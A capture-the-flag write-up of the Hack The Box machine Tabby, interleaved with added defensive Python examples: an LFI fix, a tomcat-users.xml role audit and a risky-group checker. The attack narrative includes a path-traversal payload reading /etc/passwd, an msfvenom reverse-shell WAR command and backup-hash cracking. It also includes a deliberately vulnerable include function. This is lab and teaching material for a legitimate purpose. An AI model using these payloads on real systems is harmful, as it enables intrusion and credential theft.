HTB Tabby Write-Up
User Flag
Result of the nmap scan:

```
PORT STATE SERVICE VERSION
```
Since port 80 is open, we launch gobuster against it from the terminal before heading to the browser to explore it. Exploring the “Mega Hosting” website, I found an interesting link behind the News option in the menu. It redirects to http://megahosting.htb/news.php?file=statement, so let’s first add megahosting.htb to our /etc/hosts file and then take a good look at the structure of the URL: the file parameter suggests an LFI.
To verify that, head to Burp Repeater, set /news.php?file=../../../../etc/passwd as the URI, and we get the file back.

```
root:x:0:0:root:/root:/bin/bash
```
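The include pattern that makes news.php exploitable, next to a hardened version, as an added example that is not part of the write-up. The page directory layout, the `.html` extension and the allowlist of page names are assumptions made for the demo; a temporary tree is built so it runs offline.

```python
# Added example, not from the write-up: the unchecked include behind a
# "news.php?file=..." LFI, next to a hardened version. The page directory
# layout and the allowlist below are assumptions made for this demo.
import os
import tempfile
from pathlib import Path
from typing import Tuple


def serve_vulnerable(base_dir: str, file_param: str) -> str:
    """Broken pattern: user input is joined onto a base path unchecked, so
    '../../../../etc/passwd' walks out of base_dir (classic LFI)."""
    path = os.path.join(base_dir, file_param)
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        return fh.read()


# Assumed allowlist of page names the News page may include.
ALLOWED_PAGES = {"statement", "about"}


def serve_hardened(base_dir: str, file_param: str) -> str:
    """Fixed pattern: map the parameter to a fixed set of page names, then
    verify the resolved path is still inside base_dir. The allowlist alone
    blocks traversal; the containment check also survives a later change
    that starts accepting free-form names."""
    if file_param not in ALLOWED_PAGES:
        raise PermissionError(f"unknown page: {file_param!r}")
    base = Path(base_dir).resolve()
    target = (base / f"{file_param}.html").resolve()
    if base not in target.parents:
        raise PermissionError("resolved path escapes the page directory")
    return target.read_text(encoding="utf-8")


def build_demo_tree() -> Tuple[str, str]:
    """Constructed fixture: a fake web root with one page, plus a fake
    'passwd' file two levels up that stands in for /etc/passwd."""
    root = Path(tempfile.mkdtemp(prefix="lfi-demo-"))
    pages = root / "www" / "pages"
    pages.mkdir(parents=True)
    (pages / "statement.html").write_text("<h1>Statement</h1>\n", encoding="utf-8")
    (root / "passwd").write_text("root:x:0:0:root:/root:/bin/bash\n", encoding="utf-8")
    return str(pages), str(root / "passwd")


if __name__ == "__main__":
    pages_dir, _ = build_demo_tree()
    print(serve_vulnerable(pages_dir, "../../passwd"))  # leaks the fake passwd
    print(serve_hardened(pages_dir, "statement"))        # serves the page
    try:
        serve_hardened(pages_dir, "../../passwd")
    except PermissionError as exc:
        print("blocked:", exc)
```

The allowlist is the real fix: the parameter never becomes a path at all, it selects one of a handful of known pages. The `parents` check is cheap insurance in case someone later relaxes the allowlist.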
From here, I forgot about the still-running gobuster and tried getting RCE with the different techniques illustrated in PayloadsAllTheThings, but none of them worked. So it’s time to explore port 8080.
On port 8080 you will find the default index page that Tomcat serves right after installation. The page tells us Tomcat 9 is in use and gives some information about paths worth exploring for interesting files. Clicking the link to the Tomcat manager prompts for a password, so the manager is deployed, but the default credentials I tried did not work.
From all of that, the attack path became pretty clear: use the LFI to read the tomcat-users.xml file, gain access to the manager, and upload a WAR that gives me a reverse shell.
For about an hour I tried reading tomcat-users.xml from the well-known paths, including the ones listed on the default index page, but NO-THING! Then I re-read the index page carefully and paid attention to this:
You might consider installing the following packages, if you haven’t already done so:
It’s talking about a package manager, so maybe the apt package of tomcat9 does not use the standard configuration paths. To check, I installed tomcat9 myself and queried the list of files installed by the package.

```
# No need to use sudo if you are already root
```

The result is /usr/share/tomcat9/etc/tomcat-users.xml, which is not a common location at all, and using it in our LFI gives us the file.
```xml
<?xml version="1.0" encoding="UTF-8"?>
```

He-he, we have a password! But be aware that this password is associated not with the manager-gui role but with manager-script. This means we can’t use these credentials in the manager HTML frontend, only in the text “API”. That said, let’s create our reverse shell WAR and upload it using curl.

```
msfvenom -p java/jsp_shell_reverse_tcp LHOST=tun0 LPORT=4444 -f war -o rev_sh.war
```
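An audit of a tomcat-users.xml from the defender’s side, as an added example that is not part of the write-up: it lists every account, which roles it holds, and whether those roles unlock the HTML manager, the text interface, or both. The sample XML is constructed for the demo and is not the box’s real file; the role names are the ones Tomcat ships with its manager and host-manager webapps.

```python
# Added example, not from the write-up: audit a tomcat-users.xml for
# accounts that can reach the manager application. The XML below is a
# constructed sample, not the file recovered from the box.
import xml.etree.ElementTree as ET
from typing import Dict, Set

SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="deploy" password="REPLACE_ME" roles="manager-script"/>
  <user username="admin"  password="REPLACE_ME" roles="manager-gui"/>
  <user username="viewer" password="REPLACE_ME" roles="probe"/>
</tomcat-users>
"""

# Both deploy roles let the holder upload a WAR, which is code execution as
# the Tomcat service account. manager-gui additionally unlocks /manager/html;
# manager-script only unlocks the /manager/text interface scripts use.
DEPLOY_ROLES = {"manager-gui", "manager-script"}
MANAGER_ROLES = DEPLOY_ROLES | {"manager-jmx", "manager-status", "admin-gui", "admin-script"}


def _local(tag: str) -> str:
    """Strip the XML namespace so the audit works with or without xmlns."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text: str) -> Dict[str, Dict[str, object]]:
    """Per user: its roles and what they unlock on the manager webapp."""
    report: Dict[str, Dict[str, object]] = {}
    for elem in ET.fromstring(xml_text).iter():
        if _local(elem.tag) != "user":
            continue
        # Tomcat accepts either attribute name for the account name.
        name = elem.get("username") or elem.get("name") or ""
        roles: Set[str] = {r.strip() for r in (elem.get("roles") or "").split(",") if r.strip()}
        report[name] = {
            "roles": roles,
            "can_deploy": bool(roles & DEPLOY_ROLES),
            "html_ui": "manager-gui" in roles,
            "text_api_only": "manager-script" in roles and "manager-gui" not in roles,
            "any_manager_role": bool(roles & MANAGER_ROLES),
            "has_password_attr": elem.get("password") is not None,
        }
    return report


if __name__ == "__main__":
    for user, info in audit_tomcat_users(SAMPLE_TOMCAT_USERS).items():
        flags = [k for k in ("can_deploy", "html_ui", "text_api_only") if info[k]]
        print(f"{user:8s} roles={sorted(info['roles'])} {' '.join(flags)}")
```

The point the write-up makes about manager-script shows up as `text_api_only`: an account like that is invisible if you only test the HTML login, yet it can still deploy a WAR. The `has_password_attr` flag is the reminder that whatever is in that attribute is what an LFI hands to an attacker, so any account with a manager role in this file deserves a strong, rotated secret and a network restriction on /manager.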
Now we head to http://megahosting.htb:8080/rev_sh/ and catch a shell as user tomcat!
For the lateral movement to user ash, you need to remember what you read on the News page of the website. They were hacked and deactivated a functionality, so maybe some files of that functionality are still lying around. After spawning a TTY shell with python3 and exploring, I found an encrypted backup at /var/www/html/files/16162020_backup.zip. Let’s download it and use John the Ripper to crack it.

```
zip2john 16162020_backup.zip backuphash
```

Try admin@it as ash’s password and you become user ash.
Root Flag
Running linEnum.sh on the box reveals that user ash belongs to the lxd group, which is a privilege escalation vector 99% of the time. You can find a tutorial on how to do it here. The only difficulty I ran into was the filesystem: I couldn’t write to, or correctly read, some directories like /home/ash or /tmp, so I just created a directory under /dev/shm/ as my workspace for the privesc.
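The check an administrator would run to catch this before an attacker does, as an added example that is not part of the write-up: parse /etc/group and /etc/passwd and report every account sitting in a group that is effectively root-equivalent, lxd among them. The file contents below are constructed for the demo; the paths and group descriptions are the standard ones.

```python
# Added example, not from the write-up: flag accounts whose group membership
# is root-equivalent. The /etc/group and /etc/passwd text is constructed.
from typing import Dict, List, Set, Tuple

# Why each group matters; lxd is the one this box hinges on.
RISKY_GROUPS = {
    "lxd": "can start a privileged container with the host filesystem mounted",
    "docker": "can start a container with the host filesystem mounted",
    "disk": "can read raw block devices, bypassing file permissions",
    "sudo": "intended administrators; confirm the list is deliberate",
}

SAMPLE_GROUP = """root:x:0:
sudo:x:27:
disk:x:6:
lxd:x:116:ash

tomcat:x:997:
ash:x:1000:
"""

SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
tomcat:x:997:997::/var/lib/tomcat9:/usr/sbin/nologin
ash:x:1000:1000:ash:/home/ash:/bin/bash
"""


def parse_group(text: str) -> Dict[str, Tuple[int, Set[str]]]:
    """name -> (gid, supplementary members). Blank and malformed lines are skipped."""
    groups: Dict[str, Tuple[int, Set[str]]] = {}
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) != 4 or not parts[2].isdigit():
            continue
        name, _, gid, members = parts
        groups[name] = (int(gid), {m for m in members.split(",") if m})
    return groups


def primary_gids(passwd_text: str) -> Dict[str, int]:
    """user -> primary gid from /etc/passwd."""
    out: Dict[str, int] = {}
    for line in passwd_text.splitlines():
        parts = line.strip().split(":")
        if len(parts) == 7 and parts[3].isdigit():
            out[parts[0]] = int(parts[3])
    return out


def groups_of(user: str, group_text: str, passwd_text: str) -> Set[str]:
    """All groups a user belongs to: supplementary ones plus the primary gid,
    which /etc/group alone does not list."""
    groups = parse_group(group_text)
    found = {name for name, (_, members) in groups.items() if user in members}
    gid = primary_gids(passwd_text).get(user)
    found |= {name for name, (g, _) in groups.items() if g == gid}
    return found


def risky_memberships(group_text: str, passwd_text: str) -> Dict[str, List[str]]:
    """user -> sorted risky groups, only for users that have at least one."""
    result: Dict[str, List[str]] = {}
    for user in primary_gids(passwd_text):
        risky = sorted(groups_of(user, group_text, passwd_text) & set(RISKY_GROUPS))
        if risky:
            result[user] = risky
    return result


if __name__ == "__main__":
    for user, risky in risky_memberships(SAMPLE_GROUP, SAMPLE_PASSWD).items():
        for g in risky:
            print(f"{user}: member of {g} ({RISKY_GROUPS[g]})")
```

The primary-gid lookup matters because a user whose primary group is lxd never appears in the member field of /etc/group. On a real host, feed it the contents of /etc/group and /etc/passwd; the remediation for a hit like ash is to remove the membership (`gpasswd -d ash lxd`) unless that user is meant to administer containers, in which case they should be treated as root.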
Congratulations, you just rooted the box.